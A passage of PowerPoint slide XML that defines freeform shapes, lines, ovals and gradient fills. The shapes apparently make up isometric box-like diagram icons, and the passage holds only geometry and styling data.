              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 248"/>
                  <a:gd name="T1" fmla="*/ 69 h 239"/>
                  <a:gd name="T2" fmla="*/ 0 w 248"/>
                  <a:gd name="T3" fmla="*/ 239 h 239"/>
                  <a:gd name="T4" fmla="*/ 248 w 248"/>
                  <a:gd name="T5" fmla="*/ 172 h 239"/>
                  <a:gd name="T6" fmla="*/ 248 w 248"/>
                  <a:gd name="T7" fmla="*/ 0 h 239"/>
                  <a:gd name="T8" fmla="*/ 0 w 248"/>
                  <a:gd name="T9" fmla="*/ 69 h 2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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 239"/>
                  <a:gd name="T17" fmla="*/ 248 w 248"/>
                  <a:gd name="T18" fmla="*/ 239 h 2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8" h="239">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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FFC269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" name="Freeform 13132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6598" y="2609"/>
                <a:ext cx="45" cy="46"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 234"/>
                  <a:gd name="T1" fmla="*/ 61 h 234"/>
                  <a:gd name="T2" fmla="*/ 0 w 234"/>
                  <a:gd name="T3" fmla="*/ 234 h 234"/>
                  <a:gd name="T4" fmla="*/ 234 w 234"/>
                  <a:gd name="T5" fmla="*/ 172 h 234"/>
                  <a:gd name="T6" fmla="*/ 234 w 234"/>
                  <a:gd name="T7" fmla="*/ 0 h 234"/>
                  <a:gd name="T8" fmla="*/ 0 w 234"/>
                  <a:gd name="T9" fmla="*/ 61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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 234"/>
                  <a:gd name="T17" fmla="*/ 234 w 234"/>
                  <a:gd name="T18" fmla="*/ 234 h 2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4" h="234">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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FFC269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" name="Freeform 13133"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6444" y="2482"/>
                <a:ext cx="149" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 325 w 325"/>
                  <a:gd name="T1" fmla="*/ 275 h 411"/>
                  <a:gd name="T2" fmla="*/ 277 w 325"/>
                  <a:gd name="T3" fmla="*/ 338 h 411"/>
                  <a:gd name="T4" fmla="*/ 48 w 325"/>
                  <a:gd name="T5" fmla="*/ 404 h 411"/>
                  <a:gd name="T6" fmla="*/ 0 w 325"/>
                  <a:gd name="T7" fmla="*/ 369 h 411"/>
                  <a:gd name="T8" fmla="*/ 0 w 325"/>
                  <a:gd name="T9" fmla="*/ 137 h 411"/>
                  <a:gd name="T10" fmla="*/ 48 w 325"/>
                  <a:gd name="T11" fmla="*/ 74 h 411"/>
                  <a:gd name="T12" fmla="*/ 277 w 325"/>
                  <a:gd name="T13" fmla="*/ 8 h 411"/>
                  <a:gd name="T14" fmla="*/ 325 w 325"/>
                  <a:gd name="T15" fmla="*/ 43 h 411"/>
                  <a:gd name="T16" fmla="*/ 325 w 325"/>
                  <a:gd name="T17" fmla="*/ 275 h 4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25"/>
                  <a:gd name="T28" fmla="*/ 0 h 411"/>
                  <a:gd name="T29" fmla="*/ 325 w 325"/>
                  <a:gd name="T30" fmla="*/ 411 h 4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25" h="411">
                    <a:moveTo>
                      <a:pt x="325" y="275"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="325" y="302"/>
                      <a:pt x="304" y="330"/>
                      <a:pt x="277" y="338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="404"/>
                      <a:pt x="48" y="404"/>
                      <a:pt x="48" y="404"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="411"/>
                      <a:pt x="0" y="396"/>
                      <a:pt x="0" y="369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10"/>
                      <a:pt x="22" y="82"/>
                      <a:pt x="48" y="74"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="277" y="8"/>
                      <a:pt x="277" y="8"/>
                      <a:pt x="277" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="304" y="0"/>
                      <a:pt x="325" y="16"/>
                      <a:pt x="325" y="43"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="325" y="2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" name="Line 13134"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6556" y="2491"/>
                <a:ext cx="0" cy="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" name="Line 13135"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6519" y="2501"/>
                <a:ext cx="0" cy="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" name="Line 13136"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6482" y="2511"/>
                <a:ext cx="0" cy="15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" name="Freeform 13137"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6189" y="2143"/>
                <a:ext cx="439" cy="207"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 468 w 956"/>
                  <a:gd name="T1" fmla="*/ 0 h 451"/>
                  <a:gd name="T2" fmla="*/ 0 w 956"/>
                  <a:gd name="T3" fmla="*/ 125 h 451"/>
                  <a:gd name="T4" fmla="*/ 488 w 956"/>
                  <a:gd name="T5" fmla="*/ 451 h 451"/>
                  <a:gd name="T6" fmla="*/ 956 w 956"/>
                  <a:gd name="T7" fmla="*/ 325 h 451"/>
                  <a:gd name="T8" fmla="*/ 468 w 956"/>
                  <a:gd name="T9" fmla="*/ 0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56"/>
                  <a:gd name="T16" fmla="*/ 0 h 451"/>
                  <a:gd name="T17" fmla="*/ 956 w 956"/>
                  <a:gd name="T18" fmla="*/ 451 h 4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56" h="451">
                    <a:moveTo>
                      <a:pt x="468" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="125"/>
                      <a:pt x="0" y="125"/>
                      <a:pt x="0" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="488" y="451"/>
                      <a:pt x="488" y="451"/>
                      <a:pt x="488" y="451"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="956" y="325"/>
                      <a:pt x="956" y="325"/>
                      <a:pt x="956" y="325"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="956" y="325"/>
                      <a:pt x="549" y="0"/>
                      <a:pt x="46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" name="Freeform 13138"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6189" y="2200"/>
                <a:ext cx="224" cy="150"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 488"/>
                  <a:gd name="T1" fmla="*/ 0 h 326"/>
                  <a:gd name="T2" fmla="*/ 488 w 488"/>
                  <a:gd name="T3" fmla="*/ 326 h 326"/>
                  <a:gd name="T4" fmla="*/ 117 w 488"/>
                  <a:gd name="T5" fmla="*/ 226 h 326"/>
                  <a:gd name="T6" fmla="*/ 0 w 488"/>
                  <a:gd name="T7" fmla="*/ 198 h 326"/>
                  <a:gd name="T8" fmla="*/ 0 w 488"/>
                  <a:gd name="T9" fmla="*/ 0 h 3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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 326"/>
                  <a:gd name="T17" fmla="*/ 488 w 488"/>
                  <a:gd name="T18" fmla="*/ 326 h 3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8" h="326">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="0"/>
                      <a:pt x="488" y="326"/>
                      <a:pt x="488" y="326"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="226"/>
                      <a:pt x="117" y="226"/>
                      <a:pt x="117" y="226"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="198"/>
                      <a:pt x="0" y="198"/>
                      <a:pt x="0" y="198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76" name="Line 16695"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm flipV="1">
              <a:off x="8656254" y="1685861"/>
              <a:ext cx="0" cy="17938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pic>
          <p:nvPicPr>
            <p:cNvPr id="77" name="Picture 16698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gray">
            <a:xfrm>
              <a:off x="8521316" y="1544573"/>
              <a:ext cx="255588" cy="157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Freeform 16344"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6648187" y="2130631"/>
              <a:ext cx="2063750" cy="555625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4C7013">
                    <a:gamma/>
                    <a:tint val="68627"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="4C7013"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gradFill>
            <a:ln w="19050" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="bg1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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="79" name="Group 16352"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="6849800" y="2160794"/>
              <a:ext cx="1593850" cy="460375"/>
              <a:chOff x="2158" y="2963"/>
              <a:chExt cx="3583" cy="1038"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="80" name="Freeform 16353"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="2963"/>
                <a:ext cx="3583" cy="962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3583"/>
                  <a:gd name="T1" fmla="*/ 601 h 962"/>
                  <a:gd name="T2" fmla="*/ 2239 w 3583"/>
                  <a:gd name="T3" fmla="*/ 0 h 962"/>
                  <a:gd name="T4" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T5" fmla="*/ 360 h 962"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3583"/>
                  <a:gd name="T7" fmla="*/ 962 h 962"/>
                  <a:gd name="T8" fmla="*/ 0 w 3583"/>
                  <a:gd name="T9" fmla="*/ 601 h 9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83"/>
                  <a:gd name="T16" fmla="*/ 0 h 962"/>
                  <a:gd name="T17" fmla="*/ 3583 w 3583"/>
                  <a:gd name="T18" fmla="*/ 962 h 9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83" h="962">
                    <a:moveTo>
                      <a:pt x="0" y="601"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3583" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="601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" name="Freeform 16354"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3502" y="3323"/>
                <a:ext cx="2239" cy="678"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2239"/>
                  <a:gd name="T1" fmla="*/ 602 h 678"/>
                  <a:gd name="T2" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T3" fmla="*/ 0 h 678"/>
                  <a:gd name="T4" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T5" fmla="*/ 75 h 678"/>
                  <a:gd name="T6" fmla="*/ 0 w 2239"/>
                  <a:gd name="T7" fmla="*/ 678 h 678"/>
                  <a:gd name="T8" fmla="*/ 0 w 2239"/>
                  <a:gd name="T9" fmla="*/ 602 h 6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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 678"/>
                  <a:gd name="T17" fmla="*/ 2239 w 2239"/>
                  <a:gd name="T18" fmla="*/ 678 h 6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9" h="678">
                    <a:moveTo>
                      <a:pt x="0" y="602"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2239" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="602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" name="Freeform 16355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2158" y="3564"/>
                <a:ext cx="1344" cy="437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 437"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 361 h 437"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 437 h 437"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 75 h 437"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0 h 4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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 437"/>
                  <a:gd name="T17" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T18" fmla="*/ 437 h 4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4" h="437">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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" name="Oval 16356"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2900" y="3679"/>
                <a:ext cx="170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" name="Oval 16357"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3145" y="3613"/>
                <a:ext cx="170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" name="Oval 16358"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3389" y="3547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" name="Oval 16359"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3634" y="3481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7" name="Oval 16360"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3877" y="3417"/>
                <a:ext cx="173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" name="Oval 16361"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4123" y="3351"/>
                <a:ext cx="173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" name="Oval 16362"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4366" y="3285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" name="Oval 16363"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4612" y="3219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" name="Oval 16364"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4858" y="3155"/>
                <a:ext cx="170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92" name="Group 12930"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7119675" y="1754394"/>
              <a:ext cx="314325" cy="560387"/>
              <a:chOff x="2738" y="59"/>
              <a:chExt cx="566" cy="1006"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="93" name="Line 12931"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="2853" y="535"/>
                <a:ext cx="54" cy="1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" name="Line 12932"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipV="1">
                <a:off x="2853" y="548"/>
                <a:ext cx="54" cy="1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5" name="Freeform 12933"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2955" y="757"/>
                <a:ext cx="349" cy="308"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2268"/>
                  <a:gd name="T1" fmla="*/ 607 h 2003"/>
                  <a:gd name="T2" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T3" fmla="*/ 0 h 2003"/>
                  <a:gd name="T4" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T5" fmla="*/ 1396 h 2003"/>
                  <a:gd name="T6" fmla="*/ 5 w 2268"/>
                  <a:gd name="T7" fmla="*/ 2003 h 2003"/>
                  <a:gd name="T8" fmla="*/ 0 w 2268"/>
                  <a:gd name="T9" fmla="*/ 607 h 20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68"/>
                  <a:gd name="T16" fmla="*/ 0 h 2003"/>
                  <a:gd name="T17" fmla="*/ 2268 w 2268"/>
                  <a:gd name="T18" fmla="*/ 2003 h 200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68" h="2003">
                    <a:moveTo>
                      <a:pt x="0" y="607"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2268" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2268" y="1396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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6" name="Freeform 12934"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2749" y="795"/>
                <a:ext cx="207" cy="268"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1349"/>
                  <a:gd name="T1" fmla="*/ 359 h 1741"/>
                  <a:gd name="T2" fmla="*/ 0 w 1349"/>
                  <a:gd name="T3" fmla="*/ 0 h 1741"/>
                  <a:gd name="T4" fmla="*/ 2 w 1349"/>
                  <a:gd name="T5" fmla="*/ 1380 h 1741"/>
                  <a:gd name="T6" fmla="*/ 1349 w 1349"/>
                  <a:gd name="T7" fmla="*/ 1741 h 1741"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1349"/>
                  <a:gd name="T9" fmla="*/ 359 h 17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9"/>
                  <a:gd name="T16" fmla="*/ 0 h 1741"/>
                  <a:gd name="T17" fmla="*/ 1349 w 1349"/>
                  <a:gd name="T18" fmla="*/ 1741 h 17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9" h="1741">
                    <a:moveTo>
                      <a:pt x="1344" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1349" y="1741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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7" name="Freeform 12935"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2749" y="701"/>
                <a:ext cx="555" cy="149"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3612"/>
                  <a:gd name="T1" fmla="*/ 609 h 968"/>
                  <a:gd name="T2" fmla="*/ 2284 w 3612"/>
                  <a:gd name="T3" fmla="*/ 0 h 968"/>
                  <a:gd name="T4" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T5" fmla="*/ 361 h 968"/>
                  <a:gd name="T6" fmla="*/ 1344 w 3612"/>
                  <a:gd name="T7" fmla="*/ 968 h 968"/>
                  <a:gd name="T8" fmla="*/ 0 w 3612"/>
                  <a:gd name="T9" fmla="*/ 609 h 9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12"/>
                  <a:gd name="T16" fmla="*/ 0 h 968"/>
                  <a:gd name="T17" fmla="*/ 3612 w 3612"/>
                  <a:gd name="T18" fmla="*/ 968 h 9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12" h="968">
                    <a:moveTo>
                      <a:pt x="0" y="609"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2284" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3612" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60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8" name="Freeform 12936"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3031" y="559"/>
                <a:ext cx="69" cy="235"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 452"/>
                  <a:gd name="T1" fmla="*/ 1526 h 1526"/>
                  <a:gd name="T2" fmla="*/ 0 w 452"/>
                  <a:gd name="T3" fmla="*/ 121 h 1526"/>
                  <a:gd name="T4" fmla="*/ 452 w 452"/>
                  <a:gd name="T5" fmla="*/ 0 h 1526"/>
                  <a:gd name="T6" fmla="*/ 452 w 452"/>
                  <a:gd name="T7" fmla="*/ 1406 h 1526"/>
                  <a:gd name="T8" fmla="*/ 0 w 452"/>
                  <a:gd name="T9" fmla="*/ 1526 h 15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2"/>
                  <a:gd name="T16" fmla="*/ 0 h 1526"/>
                  <a:gd name="T17" fmla="*/ 452 w 452"/>
                  <a:gd name="T18" fmla="*/ 1526 h 15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2" h="1526">
                    <a:moveTo>
                      <a:pt x="0" y="1526"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152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" name="Freeform 12937"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2961" y="559"/>
                <a:ext cx="70" cy="235"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 453"/>
                  <a:gd name="T1" fmla="*/ 0 h 1526"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 1406 h 1526"/>
                  <a:gd name="T4" fmla="*/ 453 w 453"/>
                  <a:gd name="T5" fmla="*/ 1526 h 1526"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 121 h 1526"/>
                  <a:gd name="T8" fmla="*/ 0 w 453"/>
                  <a:gd name="T9" fmla="*/ 0 h 15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3"/>
                  <a:gd name="T16" fmla="*/ 0 h 1526"/>
                  <a:gd name="T17" fmla="*/ 453 w 453"/>
                  <a:gd name="T18" fmla="*/ 1526 h 15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3" h="1526">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="1526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="121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0" name="Freeform 12938"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2961" y="541"/>
                <a:ext cx="139" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 905"/>
                  <a:gd name="T1" fmla="*/ 120 h 241"/>
                  <a:gd name="T2" fmla="*/ 453 w 905"/>
                  <a:gd name="T3" fmla="*/ 0 h 241"/>
                  <a:gd name="T4" fmla="*/ 905 w 905"/>
                  <a:gd name="T5" fmla="*/ 120 h 241"/>
                  <a:gd name="T6" fmla="*/ 453 w 905"/>
                  <a:gd name="T7" fmla="*/ 241 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 905"/>
                  <a:gd name="T9" fmla="*/ 120 h 2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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 241"/>
                  <a:gd name="T17" fmla="*/ 905 w 905"/>
                  <a:gd name="T18" fmla="*/ 241 h 2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05" h="241">
                    <a:moveTo>
                      <a:pt x="0" y="120"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="453" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12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1" name="Freeform 12939"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2816" y="433"/>
                <a:ext cx="139" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 905 w 905"/>
                  <a:gd name="T1" fmla="*/ 1184 h 1184"/>
                  <a:gd name="T2" fmla="*/ 0 w 905"/>
                  <a:gd name="T3" fmla="*/ 938 h 1184"/>
                  <a:gd name="T4" fmla="*/ 0 w 905"/>
                  <a:gd name="T5" fmla="*/ 0 h 1184"/>
                  <a:gd name="T6" fmla="*/ 905 w 905"/>
                  <a:gd name="T7" fmla="*/ 246 h 1184"/>
                  <a:gd name="T8" fmla="*/ 905 w 905"/>
                  <a:gd name="T9" fmla="*/ 1184 h 1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05"/>
                  <a:gd name="T16" fmla="*/ 0 h 1184"/>
                  <a:gd name="T17" fmla="*/ 905 w 905"/>
                  <a:gd name="T18" fmla="*/ 1184 h 1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05" h="1184">
                    <a:moveTo>
                      <a:pt x="905" y="1184"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="938"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="905" y="118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2" name="Freeform 12940"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
